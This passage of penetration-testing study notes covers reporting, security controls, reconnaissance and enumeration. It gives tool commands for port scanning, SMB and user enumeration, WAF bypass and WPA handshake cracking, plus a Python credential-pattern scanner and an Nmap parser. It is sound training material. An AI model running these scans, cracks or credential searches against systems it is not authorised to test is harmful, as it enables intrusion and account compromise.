- Importance: Enhances readability and professionalism, making it easier for stakeholders to understand and act on the findings.

**Documentation Specifications**
- Purpose: Establishes detailed guidelines for documenting the penetration test.
- Example: Specifying the format for capturing screenshots, logs, and evidence of findings.
- Importance: Ensures comprehensive, clear documentation that can be easily reviewed and referenced.

**Risk Scoring**
- Purpose: Provides a quantifiable measure of the risk associated with each identified vulnerability.
- Example: Using a scoring system such as CVSS (Common Vulnerability Scoring System) to rate the severity of each vulnerability.
- Caveat: A CVSS base score measures the technical severity of a flaw in isolation, not risk to this client. Pair it with environmental context (exposure, compensating controls, data affected) before using it as a remediation priority.
- Importance: Helps prioritize remediation efforts based on the risk level.

**Definitions**
- Purpose: Clarifies the terminology and concepts used in the report.
- Example: Defining terms such as "exploit," "vulnerability," "risk," and "threat."
- Importance: Ensures all stakeholders share a common understanding of the terms used in the report.
**Report Components**

**Executive Summary**
- Purpose: Provides a high-level overview of the test findings and recommendations.
- Example: Summarizing the key vulnerabilities, the overall risk level, and the major recommendations.
- Importance: Lets executives and non-technical stakeholders grasp the essential outcomes and the actions needed.

**Methodology**
- Purpose: Describes the testing approach and techniques used.
- Example: Detailing the phases of the test, the tools used, and the scope of testing.
- Importance: Ensures transparency and reproducibility of the test.

**Detailed Findings**
- Purpose: Provides an in-depth description of each identified vulnerability.
- Example: Including the vulnerability description, evidence, risk rating, and potential impact.
- Importance: Gives technical teams the detail they need to understand and address each issue.

**Attack Narrative**
- Purpose: Describes the steps taken to exploit vulnerabilities in narrative form.
- Example: Detailing the sequence of actions taken to compromise a system and the outcome of each step.
- Importance: Illustrates the practical impact of the vulnerabilities and how well the existing defenses held up.

**Recommendations**
- Purpose: Offers guidance on how to remediate the identified vulnerabilities.
- Example: Providing the specific remediation steps, configuration changes, or patches needed.
- Importance: Provides actionable steps to mitigate risk and improve security posture.
- Remediation Guidance: Specific instructions for fixing the identified vulnerabilities.

**Test Limitations and Assumptions**
- Purpose: Clarifies the scope limitations and the assumptions made during testing.
- Example: Noting any areas not tested, assumptions about network configurations, or system states.
- Importance: Sets realistic expectations about the coverage and accuracy of the test results.

**Reporting Considerations**

**Legal**
- Purpose: Ensures the report complies with legal requirements and protects the interests of all parties.
- Example: Including disclaimers about the use of the report and confidentiality agreements.
- Importance: Avoids legal liabilities and ensures proper use of the report.

**Ethical**
- Purpose: Adheres to ethical standards in reporting and handling findings.
- Example: Ensuring responsible disclosure of vulnerabilities and protecting sensitive information.
- Importance: Maintains professional integrity and trustworthiness.

**Quality Control (QC)**
- Purpose: Ensures the accuracy and completeness of the report through thorough review.
- Example: Peer reviewing the report and verifying all findings and recommendations.
- Importance: Enhances the reliability and credibility of the report.

**Artificial Intelligence (AI)**
- Purpose: Uses AI tools to enhance the report's insights and accuracy.
- Example: Using AI to analyze patterns, detect anomalies, or automate parts of the reporting process.
- Importance: Improves the efficiency and depth of analysis in the report.
- Caveat: Findings, evidence, and client data pasted into a third-party AI service leave the engagement's confidentiality boundary, so check the rules of engagement first, and verify whatever the tool generates before it reaches the client.

### Objective 1.5

**Technical Controls**
- System Hardening: Secures system configurations to reduce the attack surface.
- Sanitize User Input/Parameterize Queries: Prevents injection attacks by validating input and keeping user-supplied data separate from query code.
- Multifactor Authentication (MFA): Adds additional verification factors to strengthen access security.
- Encryption: Protects data confidentiality by making the data unreadable without the key.
- Process-level Remediation: Addresses vulnerabilities within applications and business processes.
- Patch Management: Regularly updates systems to fix known vulnerabilities.
- Key Rotation: Periodically changes cryptographic keys to limit the exposure window if a key is compromised.
- Certificate Management: Manages digital certificates for secure communications.
- Secrets Management Solution: Secures sensitive information such as passwords and tokens.
- Network Segmentation: Divides networks into isolated segments to limit lateral movement.
- Infrastructure Security Controls: Secures physical and virtual infrastructure components.
**Administrative Controls**
- Role-based Access Control (RBAC) → Notes
- Secure Software Development Life Cycle (SDLC): Integrates security into each phase of software development to produce secure software.
- Minimum Password Requirements: Sets baseline standards for password creation to strengthen account security.
- Policies and Procedures: Establishes a framework for organizational security practices and employee behavior, supported by training and awareness programs.

**Operational Controls**
- Job Rotation: Reduces the risk of fraud and errors by periodically changing employees' roles.
- Time-of-Day Restrictions: Limits access to specific times to reduce the risk of unauthorized access.
- Mandatory Vacations: Detects and deters fraud by requiring employees to take regular vacations, during which someone else performs their duties.
- User Training: Educates employees on security policies and best practices to reduce human error and improve overall security.

**Physical Controls**
- Access Control Vestibule: Controls and monitors entry to secure areas, preventing unauthorized access and tailgating.
- Biometric Controls: Authenticates individuals using unique biological characteristics.
- Video Surveillance: Monitors and records activity to deter unauthorized actions and provide evidence.

August 7, 2024 · 17 min · Dhanraj Chavan

Chapter 2: Reconnaissance and Enumeration

## Chapter 2

### Objective 2.1

**Active and Passive Reconnaissance**

Active Reconnaissance → Actively interacts with the target system or network to gather information.
- Methods: Port scanning, ping sweeps, banner grabbing, social engineering.
- Risks: High detection risk; potential legal issues if performed outside the agreed scope.
- Importance: Provides detailed, actionable information about the target's systems and vulnerabilities.

Passive Reconnaissance → Gathers information about the target without directly interacting with the target's systems or network.
- Methods: OSINT, WHOIS lookup, DNS enumeration, social media monitoring, website analysis.
- Caveat: DNS enumeration is only passive while it relies on cached or third-party data. Attempting a zone transfer (AXFR) against the target's own authoritative name servers is a direct interaction that shows up in their logs, so it belongs on the active side.
- Benefits: Stealthy; reduces legal risk.
- Importance: Gathers initial information about the target without direct interaction, forming a foundation for further active reconnaissance.

**Open-Source Intelligence (OSINT)**

Social Media: Gathers personal and organizational information for social engineering and intelligence.
- Examples: LinkedIn: identifying key employees, organizational structure, and the technology stack used. Facebook/Twitter: gathering personal information, behaviors, and affiliations.
- Importance: Provides insight into potential targets, their roles, and publicly shared information that can be leveraged in social engineering attacks.

Job Boards: Identifies technologies and potential vulnerabilities based on job postings.
- Examples: Indeed/Glassdoor: reviewing job listings to find out which technologies and skills the target organization is hiring for.
- Importance: Reveals information about the organization's IT environment, security tools, and potential weak spots based on the required skills.

Scan Code Repositories: Searches for sensitive information and code vulnerabilities in public repositories.
- Examples: GitHub/GitLab: searching for exposed credentials, API keys, or sensitive configuration files, including in commit history, where a "removed" secret usually survives.
- Importance: Uncovers potentially exploitable information and code vulnerabilities that can be used in an attack.
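The code-repository bullet above says to search for exposed credentials and API keys; the Secrets Enumeration section later in Objective 2.2 names TruffleHog as the tool that automates it. The following is an added example, not code from the original notes or from the TruffleHog project: it shows the two detection strategies such tools combine, regex matches for well-known credential formats and a Shannon-entropy test for random-looking strings no pattern names. The file paths and contents are constructed, the AWS key is the placeholder key from AWS's own documentation, and the patterns are illustrative rather than exhaustive.

```python
"""Regex-plus-entropy secrets scan (added example, not from the original page).

Two passes per line: known credential formats via regex, then a Shannon-
entropy test over long base64/hex-looking runs to catch tokens the regexes
miss. Sample files below are constructed; every "secret" in them is fake.
"""
import math
import re

# Well-known credential formats. Illustrative, not exhaustive.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    # key = 'value' style assignments; group 1 captures the value.
    "generic_assignment": re.compile(
        r"""(?i)(?:password|passwd|secret|api[_-]?key|token)\s*[:=]\s*["']?([^\s"']{8,})"""
    ),
}

# Candidate tokens for the entropy pass: 20+ chars of base64/hex alphabet.
_CANDIDATE = re.compile(r"[A-Za-z0-9+/=_\-]{20,}")
ENTROPY_THRESHOLD = 4.0  # bits per character; random keys are usually 4.5+


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for an empty or single-symbol string)."""
    if not s:
        return 0.0
    counts: dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def scan_text(text: str, path: str = "<memory>") -> list[dict]:
    """Return findings as dicts with path, line number, rule name, and the matched secret."""
    findings = []
    seen = set()  # (line, secret) pairs, so the entropy pass does not re-report a regex hit
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in PATTERNS.items():
            for m in pattern.finditer(line):
                secret = m.group(1) if m.lastindex else m.group(0)
                if (lineno, secret) not in seen:
                    seen.add((lineno, secret))
                    findings.append({"path": path, "line": lineno, "rule": rule, "secret": secret})
        for m in _CANDIDATE.finditer(line):
            token = m.group(0)
            if shannon_entropy(token) >= ENTROPY_THRESHOLD and (lineno, token) not in seen:
                seen.add((lineno, token))
                findings.append({"path": path, "line": lineno, "rule": "high_entropy", "secret": token})
    return findings


def scan_files(files: dict[str, str]) -> list[dict]:
    """Scan a {path: contents} mapping, e.g. built from `git show` over each commit."""
    out = []
    for path, text in files.items():
        out.extend(scan_text(text, path))
    return out


# Constructed sample repository contents (not a real project).
SAMPLE_FILES = {
    "config/settings.py": (
        "DEBUG = False\n"
        "DB_PASSWORD = 'hunter2-hunter2'\n"             # generic_assignment
        "AWS_ACCESS_KEY_ID = 'AKIAIOSFODNN7EXAMPLE'\n"  # AWS docs placeholder key
        "BUILD_TAG = 'release-2024-08-07-final'\n"      # long but low entropy: must not fire
    ),
    "deploy/notes.md": (
        "Rotate the signing key before the demo.\n"
        "# old value was 3f9Gk2LpQz8vRw1XyB7dNc4Hs6Tj0Ua5Em\n"  # no prefix; entropy catches it
    ),
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['path']}:{f['line']}  {f['rule']:20s} {f['secret']}")
```

The entropy threshold is the tuning knob: too low and build tags, hashes in lock files, and minified JavaScript flood the output; too high and short or structured tokens slip through. In a real scan, walk every commit rather than only the working tree, since deleted secrets remain in history until it is rewritten.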
**Domain Name System (DNS)**
- DNS Lookups: Retrieve domain configuration details. Example: using nslookup or dig to retrieve A, MX, and CNAME records.
- Reverse DNS Lookups: Map IP addresses to domain names. Example: using the host command to find the PTR record (domain name) for an IP address.
- Importance: Helps map out the target's network structure and identify potential entry points.

**Cached Pages**
- Accesses historical versions of web pages to find removed or altered information.
- Example: Wayback Machine: viewing archived versions of a website to find old, possibly insecure configurations or sensitive information.
- Importance: Provides access to information that has been removed or altered, which is valuable for understanding historical security practices and changes.

**Cryptographic Flaws**
- Identifies weaknesses in encryption implementations.
- Example: SSL/TLS Analysis: using tools such as SSL Labs to assess a website's TLS configuration (protocol versions, cipher suites, certificate chain).
- Importance: Detects weaknesses in encryption that could allow data to be intercepted or manipulated.

**Password Dumps**
- Uses leaked credentials to find potential entry points.
- Example: Have I Been Pwned: checking whether the target's email addresses appear in known data breaches.
- Importance: Provides potential entry points if reused or weak passwords are found in the dumps.
- Caveat: Actually trying leaked credentials against the target is an active step and must be covered by the rules of engagement.

**Network Reconnaissance**
- Purpose: Gathers information about a target network, identifying its structure, devices, services, and potential vulnerabilities. This information is crucial for planning and executing further penetration testing activities.

**Network Scanning**
- Purpose: Identifies active devices, open ports, and services.
- Tools: Nmap, Angry IP Scanner.
- Example: Scanning a subnet to identify all active hosts.

**Ping Sweeps**
- Purpose: Discovers active devices using ICMP echo requests.
- Tools: fping, Nmap.
- Example: Using fping to ping every address in a subnet.

**Port Scanning**
- Purpose: Identifies open ports and running services.
- Tools: Nmap, Masscan.
- Example: Performing a SYN scan to identify open ports.

**OS Fingerprinting**
- Purpose: Determines the operating system of a target device.
- Tools: Nmap, Xprobe2.
- Example: Using Nmap's OS detection feature.

**Service Enumeration**
- Purpose: Gathers detailed information about the services on open ports.
- Tools: Nmap, Netcat.
- Example: Identifying the version of a web server running on port 80.

**Network Mapping**
- Purpose: Creates a visual representation of the network topology.
- Tools: Nmap with Zenmap, SolarWinds Network Topology Mapper.
- Example: Visualizing network scan results with Zenmap.

**DNS Enumeration**
- Purpose: Gathers information about the target's DNS infrastructure.
- Tools: DNSRecon, Fierce.
- Example: Listing all DNS records for a target domain.

**Protocol Scanning**
- Purpose: Identifies open ports and the services running on them by sending packets to ports on a target system; it shows which services are exposed and potentially vulnerable.

**TCP Scanning**
- Purpose: Identifies open TCP ports and services by analyzing TCP packet responses.
- Tools: Nmap, Masscan.
- Types:
  - SYN Scan: Sends a SYN and judges the port by the reply (SYN/ACK = open, RST = closed) without completing the handshake; needs raw-socket privileges (root/Administrator).
  - Connect Scan: Completes the full TCP handshake through the OS socket API; needs no special privileges but is more likely to be logged by the application.
  - FIN, Xmas, Null Scans: Send packets with unusual flag combinations. Per RFC 793 a closed port answers with RST while an open port stays silent, so these scans infer open ports from the absence of a reply. Windows and many network devices do not follow this behavior and report every port as closed, so treat their results as unreliable there.
- Examples: nmap -sS target_ip, nmap -sT target_ip.

**UDP Scanning**
- Purpose: Identifies open UDP ports and services by sending UDP packets and analyzing responses.
- Tools: Nmap, Unicornscan.
- Example: nmap -sU target_ip.
- Challenges: Less reliable and much slower, because an open UDP port often does not answer at all (Nmap reports open|filtered) and hosts rate-limit the ICMP port-unreachable messages that mark closed ports.

**Certificate Transparency Logs**
- Purpose: Public, append-only logs of certificates issued by Certificate Authorities (CAs), created so that malicious or misissued certificates can be detected. For reconnaissance they are a passive source of hostnames: every certificate issued for the target's domains, including internal or forgotten subdomains, is listed.
- Tools: crt.sh: a website for searching Certificate Transparency logs. Google Certificate Transparency: a project providing public logs of issued certificates.
- Example: Using crt.sh to find all certificates issued for a target domain.
- Importance: Helps identify rogue or unexpected certificates, which can indicate potential man-in-the-middle (MITM) attacks or unauthorized domain usage, and expands the list of subdomains to test.

**Information Disclosure**
- Purpose: Identifies unintentional leakage of sensitive information through various channels.
- Examples:
  - Error Messages: Examining error messages that reveal software versions, file paths, or other sensitive details.
  - Metadata: Analyzing document properties for hidden information such as author names and software versions.
  - Source Code: Checking for comments in HTML or other code that disclose internal workings or credentials.
- Importance: Detecting and mitigating information disclosure reduces the risk of attackers leveraging this information for more targeted attacks.

**Search Engine Analysis/Enumeration**
- Purpose: Uses search engines to find sensitive information or entry points exposed on the web.
- Tools: Google Dorking: using advanced search operators to find exposed information. Shodan: search engine for Internet-connected devices.
- Example: Using Google dorks to find publicly accessible login pages or sensitive files, e.g. site:example.com inurl:login
- Importance: Uncovers publicly accessible information that might otherwise be overlooked, handing attackers valuable data.

**Network Sniffing**
- Purpose: Captures and analyzes network traffic to gather information about the network and the devices on it.
- Tools: Wireshark: popular network protocol analyzer. tcpdump: command-line packet analyzer.
- Example: Capturing traffic to identify the protocols in use, active devices, and potential vulnerabilities (cleartext credentials, legacy protocols).
- Importance: Provides insight into network communication patterns, potential vulnerabilities, and security posture.

**IoT and Operational Technology (OT) Protocols**
- Purpose: Identifies and analyzes protocols used in IoT and OT environments.
- Examples: Modbus, DNP3: commonly used in industrial control systems (ICS). MQTT, CoAP: used in IoT communication.
- Importance: Understanding these protocols helps in identifying vulnerabilities specific to IoT and OT environments, which are often overlooked but critical for industrial and smart devices. Many of them (Modbus in particular) have no authentication at all, and fragile controllers have been knocked offline by ordinary port scans, so agree scanning rules with the plant operators before touching an OT network.

**Banner Grabbing**
- Purpose: Collects banners from network services to identify the software and version running on them.
- Tools: Netcat: basic network utility for reading from and writing to network connections. Nmap: supports banner grabbing through service detection.
- Example: Using Netcat to connect to an open port and capture the service banner. Command: nc target_ip port
- Importance: Identifies software versions and configurations, which can be matched against known vulnerabilities for further exploitation. Banners can be edited or removed by administrators, so confirm a version with a second source before reporting it.

**HTML Scraping**
- Purpose: Extracts information from web pages to gather intelligence about the target.
- Tools: Beautiful Soup: Python library for web scraping. Scrapy: Python framework for web scraping.
- Example: Scraping a website for email addresses, internal links, or other useful information.
- Importance: Automates the extraction of valuable information from web pages for further analysis or attacks.

### Objective 2.2

**Operating System (OS) Fingerprinting**
- Purpose: Determines the operating system of a target device.
- Tools: Nmap: includes OS detection capabilities. Xprobe2: active OS fingerprinting tool.
- Example: Using Nmap's OS detection feature to identify the operating system running on a target server. Command: nmap -O target_ip (requires raw-socket privileges, so run as root or Administrator)
- Importance: Helps tailor further attacks to the specific operating systems identified, improving the chances of successful exploitation.

**Service Discovery**
- Purpose: Identifies the services running on open ports and gathers detailed information about them.
- Tools: Nmap: service version detection. Netcat: versatile tool for interacting with network services.
- Example: Using Nmap to identify the version of a web server running on port 80.
- Command: nmap -sV target_ip
- Importance: Provides detailed information about the services, including software versions, which can be used to identify known vulnerabilities.

**Protocol Enumeration**
- Purpose: Identifies and gathers information about the protocols in use on the target network.
- Tools: Wireshark: network protocol analyzer. Nmap: supports various protocol scans.
- Example: Using Nmap to scan for specific protocols such as FTP, SSH, and SMB. Command: nmap -sV -p 21,22,139,445 target_ip (SMB uses 139 for NetBIOS session service and 445 for direct SMB over TCP)
- Importance: Understanding the communication protocols in use is crucial for identifying potential vulnerabilities.

**DNS Enumeration**
- Purpose: Gathers information about the target's DNS infrastructure.
- Tools: DNSRecon: DNS enumeration tool. Fierce: DNS reconnaissance tool.
- Example: Using DNSRecon to list all DNS records for a target domain. Command: dnsrecon -d target_domain
- Importance: Identifies domain names, subdomains, and associated IP addresses, which provide additional targets for further reconnaissance.

**Directory Enumeration**
- Purpose: Identifies and lists directories and files on web servers.
- Tools: DirBuster: web directory scanner. Gobuster: directory and file brute-forcer.
- Example: Using Gobuster to find hidden directories and files on a web server. Command: gobuster dir -u target_url -w wordlist.txt
- Importance: Helps identify hidden resources that might contain sensitive information or provide entry points for attacks.

**Host Discovery**
- Purpose: Identifies active hosts on a network.
- Tools: Nmap: network scanning tool. Ping sweep: using ping to identify live hosts.
- Example: Using Nmap to discover hosts on a network without port scanning them. Command: nmap -sn target_subnet
- Importance: Provides a list of active devices, which can be targeted for further analysis.

**Share Enumeration**
- Purpose: Identifies shared resources on a network, such as file shares.
- Tools: smbclient: command-line tool for accessing SMB/CIFS resources.
- enum4linux: Linux tool for enumerating information from Windows systems.
- Example: Using smbclient to list the shared resources on a Windows server. Command: smbclient -L //target_ip
- Importance: Identifies shared resources that might contain sensitive information or provide entry points for attacks.

**Local User Enumeration**
- Purpose: Identifies user accounts on a target system.
- Tools: enum4linux: tool for enumerating information from Windows systems. rpcclient: command-line tool for interacting with Windows RPC services.
- Example: Using enum4linux to list user accounts on a Windows system. Command: enum4linux -U target_ip
- Importance: Identifies user accounts that can be targeted for password attacks or privilege escalation.

**Email Account Enumeration**
- Purpose: Identifies email accounts associated with a target domain.
- Tools: theHarvester: tool for gathering emails, subdomains, and more. Hunter.io: web service for finding email addresses.
- Example: Using theHarvester to find email addresses associated with a target domain. Command: theHarvester -d target_domain -b google
- Importance: Identifies potential targets for phishing or social engineering.

**Wireless Enumeration**
- Purpose: Identifies wireless networks and gathers information about them.
- Tools: Kismet: wireless network detector, sniffer, and intrusion detection system. Aircrack-ng: suite of tools for wireless network security.
- Example: Using Kismet to discover wireless networks and their configurations.
- Importance: Identifies wireless networks, their security configurations, and potential vulnerabilities.

**Permission Enumeration**
- Purpose: Identifies permissions and access controls on resources.
- Tools: AccessChk: Windows (Sysinternals) tool for viewing permissions. Linux file permission commands: ls -l to view file permissions.
- Example: Using AccessChk to list the permissions on a Windows file or directory.
- Command: accesschk.exe -s target_directory
- Importance: Identifies overly permissive access controls, which can be exploited for privilege escalation or unauthorized access.

**Secrets Enumeration**
- Purpose: Identifies sensitive information such as credentials, access keys, and tokens that can be used to gain unauthorized access.
- Tools: TruffleHog: searches git history for secrets using pattern matching and entropy analysis. AWS IAM Access Analyzer: identifies resources shared with external principals and unused permissions in AWS environments (it does not find leaked access keys; that is what repository scanners are for).
- Examples:
  - Cloud Access Keys: Using TruffleHog to search for AWS keys in a Git repository. Command (TruffleHog v2 syntax): trufflehog --regex --entropy=True target_repo_url. TruffleHog v3 uses trufflehog git target_repo_url instead.
  - Passwords: Searching for plaintext passwords in configuration files.
  - API Keys: Identifying API keys in public repositories or code.
  - Session Tokens: Extracting session tokens from intercepted traffic or logs.
- Importance: Finding and securing secrets prevents unauthorized access and potential data breaches.

**Attack Path Mapping**
- Purpose: Visualizes the paths an attacker could take to exploit vulnerabilities and escalate privileges within a network.
- Tools: BloodHound: graph-based tool for analyzing Active Directory relationships (group membership, sessions, ACLs, trusts) and the privilege-escalation paths they create. CARTA: Gartner's Continuous Adaptive Risk and Trust Assessment, a risk-management approach rather than a tool.
- Example: Using BloodHound to map relationships and permissions in an Active Directory environment. Command (SharpHound collector, PowerShell): Invoke-BloodHound -CollectionMethod All
- Importance: Understanding attack paths helps in identifying and mitigating vulnerabilities before attackers can exploit them.

**Web Application Firewall (WAF) Enumeration**
- Purpose: Identifies the presence and configuration of web application firewalls protecting web applications.
- Tools: WAFW00F: tool to detect and identify WAF products.
- Example: Using WAFW00F to identify the type of WAF protecting a web application. Command: wafw00f target_url
- Origin Address: Bypassing the WAF by discovering the origin server's IP address and talking to it directly. Techniques: DNS history lookup, SSL certificate analysis.
- Importance: Understanding WAF configurations helps in planning tests that can bypass or evade these defenses, and in reporting whether the WAF actually shields the origin.

**Web Crawling**
- Purpose: Automatically traverses and maps a website's structure, identifying all accessible pages and resources.
- Tools: Burp Suite: web vulnerability scanner with crawling capabilities. Scrapy: Python framework for web crawling.
- Example: Using Burp Suite to crawl and map a web application. Command: configure Burp's crawler (the Spider in older versions) to target the application.
- Importance: Comprehensive mapping of a web application aids in identifying hidden or less obvious vulnerabilities.

**Manual Enumeration**
- Purpose: Manually investigates specific files and configurations to gather information about a target system.
- Examples:
  - robots.txt: Checking for disallowed paths that might contain sensitive information. URL: http://target_domain/robots.txt
  - Sitemap: Reviewing the sitemap for a complete list of URLs. URL: http://target_domain/sitemap.xml
  - Platform Plugins: Identifying plugins and extensions used by the web application platform (e.g., WordPress plugins). Techniques: viewing the HTML source or scanning for known plugin directories.
- Importance: Manual investigation can reveal specific details that automated tools miss, giving deeper insight into the target environment.

### Objective 2.3

**Information Gathering**
- Purpose: Collect data about the target.
- Techniques: Passive and active reconnaissance.
- Examples: Using theHarvester and Nmap.

**Data Manipulation**
- Purpose: Process and analyze the gathered data.
- Techniques: Parsing, filtering, transforming.
- Example: A Python script to parse scan results.

**Scripting Languages**
- Bash: Automates command-line tasks. Example: a network scan script.
- Python: Data manipulation and web scraping. Example: a subdomain enumeration script.
- PowerShell: Windows system administration. Example: a local user enumeration script.

**Logic Constructs**
- Loops: Repeat code blocks. Examples: for loops in Bash and Python.
- Conditionals: Execute code based on conditions.
  - Examples: if-else statements in Bash and Python.
- Operators: Perform logical, string, and arithmetic operations.
  - Arithmetic Operator → Performs mathematical operations.
  - String Operator → Manipulates and compares strings.
  - Boolean Operator → Performs logical operations.
  - Examples: Boolean, string, and arithmetic operators in Bash and Python.

**Use of Libraries, Functions, and Classes**
- Libraries: Leverage existing functionality (e.g., requests in Python).
- Functions: Encapsulate reusable code.
- Classes: Define data structures and behaviors.

### Objective 2.4

**Wayback Machine**
- Purpose: Archive of web pages; allows viewing of historical versions of websites.
- Usage: Check past versions of a target site for exposed sensitive information or vulnerabilities.
- Example: Visiting archive.org to look at past snapshots of target_site.com.

**Maltego**
- Purpose: Data mining tool; visualizes relationships between people, companies, domains, and more.
- Maltego is a data mining and link analysis tool developed by Paterva. It gathers and connects information across many platforms, helping users visualize complex relationships among people, groups, websites, domains, networks, and other entities. It is widely used in cybersecurity, open-source intelligence (OSINT), forensic investigations, and threat intelligence.
- Usage: Generate graphs that display the interconnections between different pieces of information.
- Example: Using Maltego to map the relationships between email addresses, domains, and social media profiles.

**Recon-ng**
- Purpose: Open-source web reconnaissance framework.
- Usage: Automates the gathering of open-source intelligence.
- Example: Running modules in Recon-ng to gather contacts for a domain. Command (inside the recon-ng console): marketplace install recon/domains-contacts/whois_pocs

**Shodan**
- Purpose: Search engine for Internet-connected devices.
- Usage: Find devices with specific vulnerabilities or configurations.
- Example: Using Shodan to find exposed webcams.
• Command: shodan search "webcamxp"

SpiderFoot
• Purpose: Automated OSINT tool; collects data from various sources. SpiderFoot is an open-source intelligence (OSINT) automation tool used for reconnaissance and information gathering. It automates the collection of intelligence on IP addresses, domain names, email addresses, and other entities, querying many data sources to build a detailed profile of the target. This makes it a valuable tool for penetration testers, security researchers, and threat analysts.
• Usage: Automate the collection of information about a target.
• Example: Running a scan in SpiderFoot to gather data on a target domain.
• Command: python3 sf.py -s target.com (sf.py is SpiderFoot’s command-line entry point; the web UI is started with python3 sf.py -l 127.0.0.1:5001).

WHOIS
• Purpose: Look up domain registration information.
• Usage: Find ownership and contact information for a domain.
• Example: Using a WHOIS lookup to find the registrant’s information for target.com. Many registries now redact registrant details, so expect privacy-proxy contacts.
• Command: whois target.com

nslookup/dig
• Purpose: DNS lookup utilities.
• Usage: Retrieve DNS records for a domain.
• Example: nslookup: nslookup target.com; dig: dig target.com

Censys.io
• Purpose: Search engine for internet-connected devices.
• Usage: Find devices, services, and vulnerabilities.
• Example: Searching Censys for devices running specific software versions.

Hunter.io
• Purpose: Email address search engine.
• Usage: Find email addresses associated with a domain.
• Example: Using Hunter.io to find contact emails for target.com.

DNSdumpster
• Purpose: DNS recon and research tool. DNSdumpster is an online tool that performs DNS enumeration for a given domain and gathers information about its DNS infrastructure. It helps security researchers, penetration testers, and IT professionals map the external network infrastructure associated with a domain, including subdomains, mail servers, and other DNS records.
• Usage: Find DNS records and subdomains for a target.
• Example: Using DNSdumpster to find subdomains for target.com.
Amass
• Purpose: In-depth DNS enumeration tool. Amass is an open-source OWASP project designed for in-depth network mapping and external asset discovery. It is particularly effective for DNS enumeration, subdomain discovery, and reconnaissance. Amass combines active and passive techniques and integrates data from many sources to provide comprehensive results.
• Usage: Discover subdomains and map out network structures.
• Example: Running Amass to enumerate subdomains of target.com.
• Command: amass enum -d target.com (add -passive to avoid sending traffic to the target’s own DNS infrastructure).

Nmap
• Purpose: Network scanning tool.
• Usage: Discover hosts and services on a network.
• Example: Basic scan: nmap target_ip
• Nmap Scripting Engine (NSE): Extend Nmap functionality with scripts. Example script: nmap --script http-enum target_ip

theHarvester
• Purpose: Gather emails, subdomains, hosts, and more from public sources.
• Usage: OSINT gathering tool.
• Example: theHarvester -d target.com -b google

WiGLE.net
• Purpose: Wireless network mapping service. WiGLE.net (Wireless Geographic Logging Engine) is an online service that aggregates data on the locations of wireless networks worldwide. It collects information about Wi-Fi networks (SSIDs, BSSIDs, GPS coordinates, etc.) and allows users to search, map, and analyze this data. WiGLE is popular among security researchers, penetration testers, and wireless network enthusiasts for discovering and mapping Wi-Fi networks.
• Usage: Find and map Wi-Fi networks.
• Example: Searching WiGLE.net for Wi-Fi networks in a specific area.

InSSIDer
• Purpose: Wi-Fi network scanner.
• Usage: Identify Wi-Fi networks and their configurations.
• Example: Using InSSIDer to scan for nearby Wi-Fi networks.

OSINTframework.com
• Purpose: Collection of OSINT tools and resources.
• Usage: Reference for various OSINT tools.
• Example: Visiting OSINTframework.com to find tools for a specific type of OSINT task.
Wireshark/tcpdump
• Purpose: Network protocol analyzers.
• Usage: Capture and analyze network traffic.
• Example: Wireshark: Using the graphical interface to capture packets. tcpdump: tcpdump -i eth0 -w capture.pcap

Aircrack-ng
• Purpose: Suite of tools for Wi-Fi network security assessment.
• Usage: Capture and crack WEP/WPA-PSK keys.
• Example: Capturing packets: airodump-ng wlan0 (the interface must first be put into monitor mode, e.g. with airmon-ng, which typically renames it to wlan0mon). Cracking a WPA handshake: aircrack-ng -w wordlist.txt -b target_bssid capture_file.cap (the capture must contain a complete four-way handshake; airodump-ng reports "WPA handshake" in its header when it has one).
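The Data Manipulation and Python notes in Objective 2.3 call for a script that parses scan results. The following is an added example written for these notes, not code from the original post: it parses Nmap’s XML output (what -oX writes) into records, then filters and regroups them. The XML embedded in the script is a constructed sample in the shape Nmap produces, not a real scan, and the addresses and versions in it are placeholders.

```python
"""Parse Nmap XML output (nmap -oX) into structured records, then filter it.

Added example for the Data Manipulation / Python scripting notes; it is not
code from the original post. SAMPLE_XML is a constructed sample in the shape
Nmap writes, not output from a real scan.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample of `nmap -sV -oX scan.xml 10.0.0.0/29` output (abridged).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 10.0.0.0/29">
  <host>
    <status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="nginx" version="1.18.0"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed"/>
        <service name="https"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.0.0.6" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds"/>
      </port>
      <port protocol="udp" portid="161">
        <state state="open|filtered"/>
        <service name="snmp"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="10.0.0.7" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per scanned port: host, proto, port, state, service, product, version."""
    root = ET.fromstring(xml_text)
    records = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # hosts Nmap could not reach carry no port data
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        for port in host.findall("ports/port"):
            svc = port.find("service")
            records.append({
                "host": addr,
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "state": port.find("state").get("state"),
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
            })
    return records


def open_ports_by_host(records):
    """Filter: keep only confirmed-open ports, grouped per host and sorted by number."""
    grouped = defaultdict(list)
    for r in records:
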